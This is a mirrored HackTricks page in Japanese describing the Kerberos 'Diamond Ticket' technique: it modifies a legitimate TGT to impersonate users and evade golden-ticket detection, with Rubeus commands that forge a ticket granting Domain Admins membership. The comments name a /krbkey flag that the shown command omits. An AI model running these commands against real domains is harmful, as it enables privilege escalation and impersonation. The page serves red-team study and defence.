Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 22:20:43 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md

4.8 KiB
Raw Blame History

ダイヤモンドチケット

htARTEHackTricks AWS Red Team Expert でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法

ダイヤモンドチケット

ゴールデンチケットのように、ダイヤモンドチケットは任意のユーザーとして任意のサービスにアクセスできるTGTです。 ゴールデンチケットは完全にオフラインで偽造され、そのドメインのkrbtgtハッシュで暗号化され、その後使用するためにログオンセッションに渡されます。 ドメインコントローラは、正当に発行されたTGTを追跡しないため、自分自身のkrbtgtハッシュで暗号化されたTGTを喜んで受け入れます。

ゴールデンチケットの使用を検出するための2つの一般的な技術があります

  • 対応するAS-REQがないTGS-REQを検索します。
  • Mimikatzのデフォルトの10年間有効期限など、ばかげた値を持つTGTを検索します。

ダイヤモンドチケットは、DCによって発行された正当なTGTのフィールドを変更して作成されます。 これは、TGTを要求し、ドメインのkrbtgtハッシュで復号し、チケットの必要なフィールドを変更してから再度暗号化することによって達成されます。 これにより、ダイヤモンドチケットは、ゴールデンチケットの2つの前述の欠点を克服します

  • TGS-REQには前のAS-REQがあります。
  • TGTはDCによって発行されたものであり、ドメインのKerberosポリシーのすべての正しい詳細を持っています。 ゴールデンチケットでこれらを正確に偽造することができますが、より複雑でミスの可能性があります。
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
htARTEHackTricks AWS Red Team Expert でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法